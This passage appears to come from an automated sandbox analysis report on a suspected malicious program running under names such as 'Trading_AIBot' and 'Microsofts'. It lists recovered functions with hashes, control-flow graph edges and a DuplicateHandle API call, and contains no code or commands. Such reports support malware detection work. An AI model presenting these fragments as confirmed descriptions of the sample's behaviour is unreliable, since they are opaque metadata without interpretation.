                                                                                                                                      • Opcode ID: 27554c07b22917ccbbcc14f6cb1ffa76c5d60781bf6a6a3f31cc5f0fe95778e1
                                                                                                                                      • Instruction ID: 2b801a699b9dbbad1ec03d9c44717c63c54991e9ea5279697980ae6578c2e372
                                                                                                                                      • Opcode Fuzzy Hash: 27554c07b22917ccbbcc14f6cb1ffa76c5d60781bf6a6a3f31cc5f0fe95778e1
                                                                                                                                      • Instruction Fuzzy Hash: 26D02B30D4D3C28FC7228B607884BA07F389F03211F0406C2D094865B283640499D366
                                                                                                                                      Function 00F17A50 Relevance: .0, Instructions: 13COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 24b33cd2768f2c919270109cad3f56d99469878f5886cfa0cae62aa9f28ff847
                                                                                                                                      • Instruction ID: 4fae840a884947eb82df0758d40433010fd776b72119ddb560e99657ad24be9e
                                                                                                                                      • Opcode Fuzzy Hash: 24b33cd2768f2c919270109cad3f56d99469878f5886cfa0cae62aa9f28ff847
                                                                                                                                      • Instruction Fuzzy Hash: F1C01271C453089BD2109FA5A804769767CEF02622F100158A5189225097714590A6A9
                                                                                                                                      Function 00F16D50 Relevance: .0, Instructions: 13COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 02517d86dfa6e5a199661b4369ce5fa3f3421d4e0fd3f32055a5845f2b26036b
                                                                                                                                      • Instruction ID: 5d4f2cab1dae2890f11c9eca252a41c9f27a8d2360719c115c21a0b6a72003dc
                                                                                                                                      • Opcode Fuzzy Hash: 02517d86dfa6e5a199661b4369ce5fa3f3421d4e0fd3f32055a5845f2b26036b
                                                                                                                                      • Instruction Fuzzy Hash: DFC08071D4534CDBD314DF94B404B65B77CD703312F400158D518D3200D77144D0E6B5

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.4%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:2
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 23693 51ca820 DuplicateHandle 23694 51ca8b6 23693->23694

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00BBC530 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: N
                                                                                                                                      • API String ID: 0-1130791706
                                                                                                                                      • Opcode ID: 081a0c056fa247555ba8076ea3cd8fa85ac2994c38a70f4c45ff84bb371c9e32
                                                                                                                                      • Instruction ID: 443059f95ae65837ceca2b0f0645ff43ba18fe9a5e7f2ca5a2f3044d66c9281d
                                                                                                                                      • Opcode Fuzzy Hash: 081a0c056fa247555ba8076ea3cd8fa85ac2994c38a70f4c45ff84bb371c9e32
                                                                                                                                      • Instruction Fuzzy Hash: 9E73D531D1075A8ADB11EF68C844AE9FBB1FF95300F55C6DAE45867221EB70AAC4CF81
                                                                                                                                      Function 00BB2DD1 Relevance: .4, Instructions: 390COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1540 bb2dd1-bb2ded 1541 bb2def-bb2df1 1540->1541 1542 bb2df6-bb2e06 1540->1542 1543 bb3094-bb309b 1541->1543 1544 bb2e08 1542->1544 1545 bb2e0d-bb2e1d 1542->1545 1544->1543 1547 bb307b-bb3089 1545->1547 1548 bb2e23-bb2e31 1545->1548 1551 bb309c-bb3182 1547->1551 1553 bb308b-bb308f call bb02a8 1547->1553 1548->1551 1552 bb2e37 1548->1552 1622 bb3189-bb32ac call bb16c8 call bb16d8 call bb16e8 call bb16f8 call bb02c4 1551->1622 1623 bb3184 1551->1623 1552->1551 1554 bb2e7b-bb2e9d 1552->1554 1555 bb2f3a-bb2f62 1552->1555 1556 bb2e3e-bb2e50 1552->1556 1557 bb2fd6-bb2ffc 1552->1557 1558 bb2e55-bb2e76 1552->1558 1559 bb2f14-bb2f35 1552->1559 1560 bb2f94-bb2fd1 1552->1560 1561 bb2ec8-bb2ee9 1552->1561 1562 bb302f-bb304a call bb02b8 1552->1562 1563 bb306f-bb3079 1552->1563 1564 bb2eee-bb2f0f 1552->1564 1565 bb304c-bb306d call bb18c8 1552->1565 1566 bb2ea2-bb2ec3 1552->1566 1567 bb3001-bb302d 1552->1567 1568 bb2f67-bb2f8f 1552->1568 1553->1543 1554->1543 1555->1543 1556->1543 1557->1543 1558->1543 1559->1543 1560->1543 1561->1543 1562->1543 1563->1543 1564->1543 1565->1543 1566->1543 1567->1543 1568->1543 1641 bb32b2-bb32d6 1622->1641 1623->1622 1643 bb32d8-bb32e1 1641->1643 1644 bb32e2 1641->1644 1643->1644 1646 bb32e3 1644->1646 1646->1646
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fcc34c973122243e6314ca1e325b57bd317b07c50d1f5b8f94fcaf72de681fe4
                                                                                                                                      • Instruction ID: 5cf71918fff7d8fdc233a4691b27cc55f5977ec898de2fded0123aa5c47e2c47
                                                                                                                                      • Opcode Fuzzy Hash: fcc34c973122243e6314ca1e325b57bd317b07c50d1f5b8f94fcaf72de681fe4
                                                                                                                                      • Instruction Fuzzy Hash: AAE18C74F00248CFDB08EFB9D8A46AEBBF2BF89700B148569E406A7354DF749942CB51
                                                                                                                                      Function 00BB9480 Relevance: .3, Instructions: 268COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1880 bb9480-bb94a0 1881 bb94a2 1880->1881 1882 bb94a7-bb9538 1880->1882 1881->1882 1886 bb953e-bb954e 1882->1886 1887 bb988c-bb98c0 1882->1887 1937 bb9551 call bb9a30 1886->1937 1938 bb9551 call bb9a40 1886->1938 1939 bb9551 call bb9d87 1886->1939 1891 bb9557-bb958a 1894 bb958c 1891->1894 1895 bb9591-bb959a 1891->1895 1894->1895 1896 bb987f-bb9885 1895->1896 1897 bb988b 1896->1897 1898 bb959f-bb95ab 1896->1898 1897->1887 1899 bb95b3-bb9619 1898->1899 1903 bb961f-bb968d call bb3760 1899->1903 1904 bb96d5-bb9730 1899->1904 1915 bb968f-bb96cf 1903->1915 1916 bb96d0-bb96d3 1903->1916 1914 bb9731-bb9781 1904->1914 1921 bb986a-bb9875 1914->1921 1922 bb9787-bb9869 1914->1922 1915->1916 1916->1914 1924 bb987c 1921->1924 1925 bb9877 1921->1925 1922->1921 1924->1896 1925->1924 1937->1891 1938->1891 1939->1891
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 900dd3629dad2cefe8a090342f40bacc13a1c674b8f437919a34d24f2a222ff2
                                                                                                                                      • Instruction ID: 14f2464989460f84ad64791670cedcab59353ded82bb11b862646d5f909752dc
                                                                                                                                      • Opcode Fuzzy Hash: 900dd3629dad2cefe8a090342f40bacc13a1c674b8f437919a34d24f2a222ff2
                                                                                                                                      • Instruction Fuzzy Hash: 9FC19E78E01218CFDB15DFA5D994BADBBB2BF89300F2081AAD809A7355DB355E85CF10
                                                                                                                                      Function 00BBC521 Relevance: .2, Instructions: 227COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d289c90c5de7558101e0c3dd5f85c6519a891a50efbb8df94b9bdedfc8e40144
                                                                                                                                      • Instruction ID: c7828e8e791ec8b8365a2821684a4f8f71f1a55d09f599fbc51785c97ddd37c9
                                                                                                                                      • Opcode Fuzzy Hash: d289c90c5de7558101e0c3dd5f85c6519a891a50efbb8df94b9bdedfc8e40144
                                                                                                                                      • Instruction Fuzzy Hash: 1FA1F371D006198FDB14DFA9C8847EDFBB1EF89300F14C6AAE458A7261EB709A85CF41
                                                                                                                                      Function 00BB9A30 Relevance: .2, Instructions: 224COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 61bf9986df05fe4671c3ce66118072700c331c2e9ec35ec48acf4f7f21a6f0f5
                                                                                                                                      • Instruction ID: e2c8d6668aaa88bfd407f474df41b520c0eb27fe36d7b29995d8860161b17dc0
                                                                                                                                      • Opcode Fuzzy Hash: 61bf9986df05fe4671c3ce66118072700c331c2e9ec35ec48acf4f7f21a6f0f5
                                                                                                                                      • Instruction Fuzzy Hash: 12A10770D00208CFEB14DFA9C9947EDBBB1FF89304F24826AE509A7291DB759985CF50
                                                                                                                                      Function 00BB9A40 Relevance: .2, Instructions: 220COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4467a5909588345f7431c37e80eb5112568a7de5deccee2db35db44147041b3a
                                                                                                                                      • Instruction ID: 45be3e95518ce206283525a6b9a7359a0beedcf7b19b6b3c5f1bf1fc0fc06075
                                                                                                                                      • Opcode Fuzzy Hash: 4467a5909588345f7431c37e80eb5112568a7de5deccee2db35db44147041b3a
                                                                                                                                      • Instruction Fuzzy Hash: A7A10770D00208CFEB24DFA9C954BEDBBB1FF89304F20826AE508A7291DB749985CF55
                                                                                                                                      Function 00BB9D87 Relevance: .2, Instructions: 202COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0aa91a69acc566786c22ec31f68a0bc5858c310279f1575ed33d1096aa426b25
                                                                                                                                      • Instruction ID: 564ad992ad0707373012638ae780fc3939d8241f7be9c11703730508d42ce2e9
                                                                                                                                      • Opcode Fuzzy Hash: 0aa91a69acc566786c22ec31f68a0bc5858c310279f1575ed33d1096aa426b25
                                                                                                                                      • Instruction Fuzzy Hash: C491D474D00208CFEB10DFA9C9847ECBBB1FF49311F2482AAE509A7291DB759985CF55
                                                                                                                                      Function 00BB946F Relevance: .1, Instructions: 102COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ee51fc37928548a1a70568bfb88b71fb843ed435c63fa8bbe7dc5f245b35c7a9
                                                                                                                                      • Instruction ID: 4f525219506934d0b98f881621f475b69cb4f2df6242e0aa458cb7c3282bb191
                                                                                                                                      • Opcode Fuzzy Hash: ee51fc37928548a1a70568bfb88b71fb843ed435c63fa8bbe7dc5f245b35c7a9
                                                                                                                                      • Instruction Fuzzy Hash: 3641E575D01208CBEB18DFA6D8546EDBBF2BF89300F24D12AD419AB255EB345946CF50
                                                                                                                                      Function 00BBAF78 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 554 bbaf78-bbafaf call bba428 559 bbb18b-bbb196 554->559 560 bbafb5-bbafb7 554->560 561 bbb19d-bbb1a8 559->561 560->561 562 bbafbd-bbafc1 560->562 567 bbb1af-bbb1ba 561->567 562->561 563 bbafc7-bbafff call bbab68 562->563 563->567 577 bbb005-bbb009 563->577 572 bbb1c1-bbb1cc 567->572 576 bbb1d3-bbb1ff 572->576 608 bbb206-bbb232 576->608 578 bbb00b-bbb00f 577->578 579 bbb015-bbb019 577->579 578->572 578->579 580 bbb01b-bbb022 579->580 581 bbb024-bbb028 579->581 583 bbb040-bbb044 580->583 581->583 584 bbb02a-bbb02e 581->584 587 bbb04b-bbb052 583->587 588 bbb046-bbb048 583->588 585 bbb039 584->585 586 bbb030-bbb037 584->586 585->583 586->583 590 bbb05b-bbb05f 587->590 591 bbb054 587->591 588->587 596 bbb13e-bbb141 590->596 597 bbb065-bbb069 590->597 591->590 592 bbb179-bbb184 591->592 593 bbb0ae-bbb0b1 591->593 594 bbb0dd-bbb0e0 591->594 595 bbb110-bbb113 591->595 592->559 601 bbb0bc-bbb0db 593->601 602 bbb0b3-bbb0b6 593->602 606 bbb0eb-bbb10e 594->606 607 bbb0e2-bbb0e5 594->607 599 bbb11a-bbb139 595->599 600 bbb115 595->600 603 bbb143-bbb146 596->603 604 bbb151-bbb174 596->604 597->592 605 bbb06f-bbb072 597->605 627 bbb097-bbb09b 599->627 600->599 601->627 602->576 602->601 603->604 611 bbb148-bbb14b 603->611 604->627 612 bbb079-bbb095 605->612 613 bbb074 605->613 606->627 607->606 607->608 618 bbb239-bbb2ab 608->618 611->604 611->618 612->627 613->612 637 bbb30d-bbb371 618->637 638 bbb2ad-bbb2b0 618->638 660 bbb09e call bbb4ef 627->660 661 bbb09e call bbb500 627->661 630 bbb0a4-bbb0ab 655 bbb37a-bbb38a 637->655 656 bbb373-bbb378 637->656 638->637 639 bbb2b2-bbb2c1 638->639 643 bbb2d9-bbb2dd 639->643 644 bbb2c3-bbb2c9 639->644 645 bbb2df-bbb2ff 643->645 646 bbb305-bbb30c 643->646 647 bbb2cb 644->647 648 bbb2cd-bbb2cf 644->648 645->646 647->643 648->643 657 bbb38f-bbb390 655->657 656->657 660->630 661->630
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: 9c5c67599b959656cefb4ad5afb238a187af6fee01238c0b68480839043f94e3
                                                                                                                                      • Instruction ID: 7e26ca3ea8eff2ceb588b035d8038d349633b66230f722b6ec767e28fa5eaab8
                                                                                                                                      • Opcode Fuzzy Hash: 9c5c67599b959656cefb4ad5afb238a187af6fee01238c0b68480839043f94e3
                                                                                                                                      • Instruction Fuzzy Hash: 38B1F3357042048FEB156F78D864ABE7BE2EF85320F50429AE926DB3D1DFB58C058762
                                                                                                                                      Function 051CA81A Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 662 51ca81a 663 51ca820-51ca8b4 DuplicateHandle 662->663 664 51ca8bd-51ca8da 663->664 665 51ca8b6-51ca8bc 663->665 665->664
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 051CA8A7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4655649913.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_51c0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: a0c792f1c5aeea15f7dfc7390154c098683f4eb7f7e0f032a296aed0caf5f3ff
                                                                                                                                      • Instruction ID: cdfa186f6af9cfdfadc4b5f76c024e2b8523137044662f7d3d8ff7618798472d
                                                                                                                                      • Opcode Fuzzy Hash: a0c792f1c5aeea15f7dfc7390154c098683f4eb7f7e0f032a296aed0caf5f3ff
                                                                                                                                      • Instruction Fuzzy Hash: 8621E3B5900248EFDB10CFAAD985ADEBBF8FB48310F14845AE914A7350C379A954CF65
                                                                                                                                      Function 051CA820 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 668 51ca820-51ca8b4 DuplicateHandle 669 51ca8bd-51ca8da 668->669 670 51ca8b6-51ca8bc 668->670 670->669
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 051CA8A7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4655649913.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_51c0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: 8239e9d4b35a1b2e2eb7c03a5f7489788362f21a81a0e0c1e0849e1abe0d20ba
                                                                                                                                      • Instruction ID: ec684ee6d2aeba0027699bba5c63c876df030ce6dd1c804ceaf39471af5e4572
                                                                                                                                      • Opcode Fuzzy Hash: 8239e9d4b35a1b2e2eb7c03a5f7489788362f21a81a0e0c1e0849e1abe0d20ba
                                                                                                                                      • Instruction Fuzzy Hash: 6121E3B5900248EFDB10CFAAD985ADEBBF8EB48310F14845AE914A3310C379A954CF65
                                                                                                                                      Function 00BBAF72 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 673 bbaf72-bbaf89 674 bbaf91-bbafaf 673->674 675 bbaf8c call bba428 673->675 678 bbb18b-bbb196 674->678 679 bbafb5-bbafb7 674->679 675->674 680 bbb19d-bbb1a8 678->680 679->680 681 bbafbd-bbafc1 679->681 686 bbb1af-bbb1ba 680->686 681->680 682 bbafc7-bbafff call bbab68 681->682 682->686 696 bbb005-bbb009 682->696 691 bbb1c1-bbb1cc 686->691 695 bbb1d3-bbb1ff 691->695 727 bbb206-bbb232 695->727 697 bbb00b-bbb00f 696->697 698 bbb015-bbb019 696->698 697->691 697->698 699 bbb01b-bbb022 698->699 700 bbb024-bbb028 698->700 702 bbb040-bbb044 699->702 700->702 703 bbb02a-bbb02e 700->703 706 bbb04b-bbb052 702->706 707 bbb046-bbb048 702->707 704 bbb039 703->704 705 bbb030-bbb037 703->705 704->702 705->702 709 bbb05b-bbb05f 706->709 710 bbb054 706->710 707->706 715 bbb13e-bbb141 709->715 716 bbb065-bbb069 709->716 710->709 711 bbb179-bbb184 710->711 712 bbb0ae-bbb0b1 710->712 713 bbb0dd-bbb0e0 710->713 714 bbb110-bbb113 710->714 711->678 720 bbb0bc-bbb0db 712->720 721 bbb0b3-bbb0b6 712->721 725 bbb0eb-bbb10e 713->725 726 bbb0e2-bbb0e5 713->726 718 bbb11a-bbb139 714->718 719 bbb115 714->719 722 bbb143-bbb146 715->722 723 bbb151-bbb174 715->723 716->711 724 bbb06f-bbb072 716->724 746 bbb097-bbb09b 718->746 719->718 720->746 721->695 721->720 722->723 730 bbb148-bbb14b 722->730 723->746 731 bbb079-bbb095 724->731 732 bbb074 724->732 725->746 726->725 726->727 737 bbb239-bbb2ab 727->737 730->723 730->737 731->746 732->731 756 bbb30d-bbb371 737->756 757 bbb2ad-bbb2b0 737->757 779 bbb09e call bbb4ef 746->779 780 bbb09e call bbb500 746->780 749 bbb0a4-bbb0ab 774 bbb37a-bbb38a 756->774 775 bbb373-bbb378 756->775 757->756 758 bbb2b2-bbb2c1 757->758 762 bbb2d9-bbb2dd 758->762 763 bbb2c3-bbb2c9 758->763 764 bbb2df-bbb2ff 762->764 765 bbb305-bbb30c 762->765 766 bbb2cb 763->766 767 bbb2cd-bbb2cf 763->767 764->765 766->762 767->762 776 bbb38f-bbb390 774->776 775->776 779->749 780->749
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: e68848a391b7410eab083b1e5c08679ba32998b8852ef748e5a7b0f128230c15
                                                                                                                                      • Instruction ID: a55bc780096f8a94babc20fcb0063c40d5f599edbe4431793bf5391e27fe96a0
                                                                                                                                      • Opcode Fuzzy Hash: e68848a391b7410eab083b1e5c08679ba32998b8852ef748e5a7b0f128230c15
                                                                                                                                      • Instruction Fuzzy Hash: EC81D2357002048FEB15AF78D868A7E7BE2EFC9320B5445AAE526DB3D1DFB49C018761
                                                                                                                                      Function 00BB19B8 Relevance: .6, Instructions: 552COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1483 bb19b8-bb1a13 1487 bb1a35-bb1a84 1483->1487 1488 bb1a15-bb1a34 1483->1488 1492 bb1a9f 1487->1492 1493 bb1a86-bb1a8d 1487->1493 1496 bb1aa7 1492->1496 1494 bb1a8f-bb1a94 1493->1494 1495 bb1a96-bb1a9d 1493->1495 1497 bb1aaa-bb1abe 1494->1497 1495->1497 1496->1497 1499 bb1ac0-bb1ac7 1497->1499 1500 bb1ad4-bb1adc 1497->1500 1501 bb1ac9-bb1acb 1499->1501 1502 bb1acd-bb1ad2 1499->1502 1503 bb1ade-bb1ae2 1500->1503 1501->1503 1502->1503 1505 bb1b42-bb1b45 1503->1505 1506 bb1ae4-bb1af9 1503->1506 1507 bb1b8d-bb1b93 1505->1507 1508 bb1b47-bb1b5c 1505->1508 1506->1505 1514 bb1afb-bb1afe 1506->1514 1509 bb1b99-bb1b9b 1507->1509 1510 bb268e 1507->1510 1508->1507 1520 bb1b5e-bb1b62 1508->1520 1509->1510 1512 bb1ba1-bb1ba6 1509->1512 1517 bb2693-bb2c5f 1510->1517 1518 bb263c-bb2640 1512->1518 1519 bb1bac 1512->1519 1515 bb1b1d-bb1b3b call bb02a8 1514->1515 1516 bb1b00-bb1b02 1514->1516 1515->1505 1516->1515 1521 bb1b04-bb1b07 1516->1521 1523 bb2642-bb2645 1518->1523 1524 bb2647-bb268d 1518->1524 1519->1518 1525 bb1b6a-bb1b88 call bb02a8 1520->1525 1526 bb1b64-bb1b68 1520->1526 1521->1505 1528 bb1b09-bb1b1b 1521->1528 1523->1517 1523->1524 1525->1507 1526->1507 1526->1525 1528->1505 1528->1515
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 42a50715ce7b9c4da412cc101dc0ddc18f922b111fb661cdb1f83be2183b08d6
                                                                                                                                      • Instruction ID: 830dd054d6c911b41bd780f6a8c42ea7427e9e13baa2f600f54a599c13960dcb
                                                                                                                                      • Opcode Fuzzy Hash: 42a50715ce7b9c4da412cc101dc0ddc18f922b111fb661cdb1f83be2183b08d6
                                                                                                                                      • Instruction Fuzzy Hash: FC326ED6E0D7D18BCB228F3458FC1A4BFE15F2A194B5E45CEC5C25B28BE6602886C353
                                                                                                                                      Function 00BBB500 Relevance: .4, Instructions: 381COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
